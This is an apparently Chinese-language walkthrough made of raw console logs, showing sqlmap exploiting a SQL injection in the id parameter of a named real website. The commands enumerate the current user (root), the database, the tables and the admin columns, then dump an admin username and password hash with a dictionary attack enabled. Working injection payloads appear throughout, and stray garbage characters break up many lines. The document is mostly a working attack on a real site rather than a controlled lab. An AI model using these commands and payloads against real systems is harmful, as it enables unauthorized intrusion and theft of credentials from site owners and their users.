sqlmap实例注入mysql

admin

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
, {0 \6 J- ^9 f* L2 Q, j: kms "Mysql" --current-user       /*  注解：获取当前用户名称
    sqlmap/0.9 - automatic SQL injection and database takeover tool
1 n+ L% ]8 A' [    http://sqlmap.sourceforge.net

starting at: 16:53:54
6 F2 V( ]( H; M$ S! a. ?[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
session file
# f' |+ [4 p0 [4 E+ D, ?! P[16:53:54] [INFO] resuming injection data from session file
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
$ o: |! i" ]' K8 `# Z1 E# s[16:53:54] [INFO] testing connection to the target url
% ]7 h$ \! }- ^( K4 ssqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
* Q) w  f' G, U; \6 V    Type: boolean-based blind
* \) P* F2 t9 M, F2 d3 O6 d    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
3 O$ c/ c$ Q, t0 x    Type: error-based
' M7 e9 D" ]: g1 d/ i    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
6 D) a0 U6 v& t' H5 c, H) e( l9 T120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
( X  K8 T0 v' U+ i# q/ j7 ~    Type: UNION query
5 K4 I: H6 Z' d; f    Title: MySQL UNION query (NULL) - 1 to 10 columns
% |% l, ~3 V* \- x5 f, y, T    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
0 j+ \+ S- i: C! e6 x  k(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
4 V/ U; o* ^& H/ F" ^    Type: AND/OR time-based blind
/ [; Z/ s4 y: i5 N    Title: MySQL > 5.0.11 AND time-based blind
0 f8 c; d' p& H3 ^; X9 F    Payload: id=276 AND SLEEP(5)
---
[16:53:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
- r* y+ ^/ ?+ [! m$ ?2 m8 }web application technology: Apache 2.2.11, PHP 5.3.0
; @; J1 ~6 }+ f3 P8 m" h$ Aback-end DBMS: MySQL 5.0
/ C8 l# m" C5 L5 d! }/ M2 R- m% ~[16:53:55] [INFO] fetching current user
) r' h2 z* o5 f2 p9 Lcurrent user:    'root@localhost'   
3 J* b0 A% z, T' m% E3 U% v0 p  m[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
% ?# {& D/ H6 t& r8 htput\www.wepost.com.hk'

shutting down at: 16:53:58
" ~4 n- l! V' [; g* Q" O
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
ms "Mysql" --current-db                  /*当前数据库
- f* b3 z$ x7 Q9 e' R9 W    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

starting at: 16:54:16
4 I$ ~+ y# M4 F2 c. C) P[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
+ u6 J% [  _% N9 s session file
+ j3 z8 W# s' m: H+ Z' G6 ^3 ^[16:54:16] [INFO] resuming injection data from session file
7 Y) ]) K: j4 s6 A" T5 c+ S5 r[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:54:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
3 |2 D/ ^2 j" r) k---
Place: GET
Parameter: id
2 t3 G4 e$ g& A& y  V    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
+ ?3 r& H, F8 ]; ?' Z    Payload: id=276 AND 799=799
" ]* F1 |! G# L( F2 @    Type: error-based
( z0 q6 ^" ?: @    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
/ q( r% r8 {9 O2 {, ~, J: Q/ N    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
( B9 o! M" W- P120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
# r6 \! o  x' k    Type: UNION query
3 p: n" h7 t& E( Q    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
7 B! j8 H* {% k: JCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
. a8 p0 }1 x$ y4 Z/ ]    Payload: id=276 AND SLEEP(5)
8 e; g+ ~. `2 P! z1 s# n8 p---
5 a9 \% W/ A9 ]. O; H- c8 ?5 f[16:54:17] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:54:17] [INFO] fetching current database
7 }" @" |; s1 Y& n$ i/ L% g, ccurrent database:    'wepost'
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
tput\www.wepost.com.hk'

shutting down at: 16:54:18
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
ms "Mysql" --tables  -D "wepost"         /*获取当前数据库的表名
, y% J! Z7 Z4 [4 A    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

starting at: 16:55:25
( g  W5 g  J$ H[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
/ m/ b1 N: Y2 P9 g0 @; V8 N session file
  d/ j* o4 |% [4 I[16:55:25] [INFO] resuming injection data from session file
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
, W! J/ W- z" G# z( A3 O[16:55:25] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
+ P6 G# O, f% s% ~* _4 qsts:
---
Place: GET
+ `, b+ p4 K" ?: ~$ \Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
! K; v% E" L, t    Payload: id=276 AND 799=799
    Type: error-based
" O! v/ O( a7 Y6 x    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
3 L0 i. P# i# O  f5 J),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
8 V2 e. Y) b+ P) E& ]    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
) ?" ^+ t- p* q6 M(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
( U! w, K2 f$ T! y  U8 n4 C$ `; c. {    Type: AND/OR time-based blind
9 }1 B6 P+ x& o2 q    Title: MySQL > 5.0.11 AND time-based blind
, ?2 s3 ^. `  F; N) Y0 j4 ~& q( b4 K    Payload: id=276 AND SLEEP(5)
0 h4 q" k* {6 p' _; \$ \' @4 o---
1 k% A4 j% G& N9 S8 w/ _  G[16:55:26] [INFO] the back-end DBMS is MySQL
5 }6 B. a! }0 F8 p# }web server operating system: Windows
5 |  C! c  U( _9 Oweb application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:55:26] [INFO] fetching tables for database 'wepost'
1 ^0 [: W. n* _/ ^( ][16:55:27] [INFO] the SQL query used returns 6 entries
3 R# v0 l* a# ^0 z' t. `' sDatabase: wepost
[6 tables]
$ J$ Z$ k1 o, p8 c: F/ t. |+-------------+
| admin       |
| article     |
| contributor |
8 t# L* M4 G+ P3 n# I' K% J2 [| idea        |
, P7 J9 z4 s; H6 p# D. ]$ l- || image       |
| issue       |
+-------------+
/ G2 L! C! B  v% S7 G( K+ l[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
* t  ]  y4 m' w. g! u5 G/ S* Z, u5 l1 btput\www.wepost.com.hk'

shutting down at: 16:55:33
$ |0 j  V# \8 w2 h: c
2 |3 {( p1 {% W0 PD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
ms "Mysql" --columns -T "admin" users-D "wepost" -v 0     /*获取admin表的字段名
) Q* f% O4 Y- p, j, m    sqlmap/0.9 - automatic SQL injection and database takeover tool
( g! R  ]% X% Z+ Y( X    http://sqlmap.sourceforge.net

starting at: 16:56:06
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
! j' o: f, c# h" J3 |---
  e- z: I" M" j: Q- \" e$ yPlace: GET
Parameter: id
- u% L0 z1 J2 }4 ^5 ?4 s    Type: boolean-based blind
3 ^3 f$ D! X0 }! G    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
* o. h+ S0 n" e# e, _    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
' M, e, C) l( Y    Title: MySQL UNION query (NULL) - 1 to 10 columns
, ?) I* {4 Q' e# T    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
0 Z& ^: g+ D/ N(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
7 x- m1 {& E' D& G6 eCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
# N4 Z# W  }. H+ L/ R    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
7 \7 u. p: V( }9 v5 Q2 c' Z7 f---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
- ~/ b$ b$ T' Zback-end DBMS: MySQL 5.0
: F4 d+ ~& @$ |7 v0 t* o[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
ssion': wepost, wepost
Database: wepost
Table: admin
[4 columns]
! y7 R6 T( N" ]& b+----------+-------------+
$ e9 s0 i# b" I6 R+ U' X- h! ^2 ?| Column   | Type        |
5 v, q0 M% m! A# f4 O. E+----------+-------------+
5 i$ u8 O( e! o1 O5 o| id       | int(11)     |
" w7 e6 R6 ~+ g; d: M| password | varchar(32) |
| type     | varchar(10) |
1 O! b' y+ f0 I8 t1 ?6 F| userid   | varchar(20) |
+----------+-------------+

shutting down at: 16:56:19

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
ms "Mysql"  --dump  -C "userid,password"  -T "admin" -D "wepost" -v 0      /*获取字段里面的内容
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

starting at: 16:57:14
, z/ q+ n6 \- v: p3 n2 k# j% Nsqlmap identified the following injection points with a total of 0 HTTP(s) reque
. t  c  @, ~  z  M& Tsts:
9 _. X$ Y+ o+ i- z0 u+ P4 ^: x---
Place: GET
) |; s7 a6 F) p; S3 I2 N1 e- OParameter: id
    Type: boolean-based blind
7 c4 Y6 \2 p* m. x) S    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
. V; U  g6 l% b# K1 }    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
" X& K" ~' Y; w5 k" @    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
8 U4 }) c6 x1 y(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
/ S/ [* @; o) h8 G8 e2 QCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
+ U+ {( k% X6 v. w5 F; J0 o  G    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
6 i' _8 z4 L( ^1 F% A0 {---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
- {* @! X0 H- u- l- `# Y3 F& i2 Vback-end DBMS: MySQL 5.0
: R2 N( ?9 P1 K- N4 D( |recognized possible password hash values. do you want to use dictionary attack o
+ K9 U' M' L9 `" }  {n retrieved table items? [Y/n/q] y
) v  U% ^  h7 v1 y0 Owhat's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
do you want to use common password suffixes? (slow!) [y/N] y
Database: wepost
Table: admin
0 q$ e. i- ?8 H[1 entry]
6 n  C  `" y* X1 F; p9 }+----------------------------------+------------+
| password                         | userid     |
+----------------------------------+------------+
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
: i6 d& R( O" O/ n4 x5 {3 S+----------------------------------+------------+
( l: i& |; s  [; H, y, A2 |* N" h

shutting down at: 16:58:14

& L9 n* J; z- ED:\Python27\sqlmap>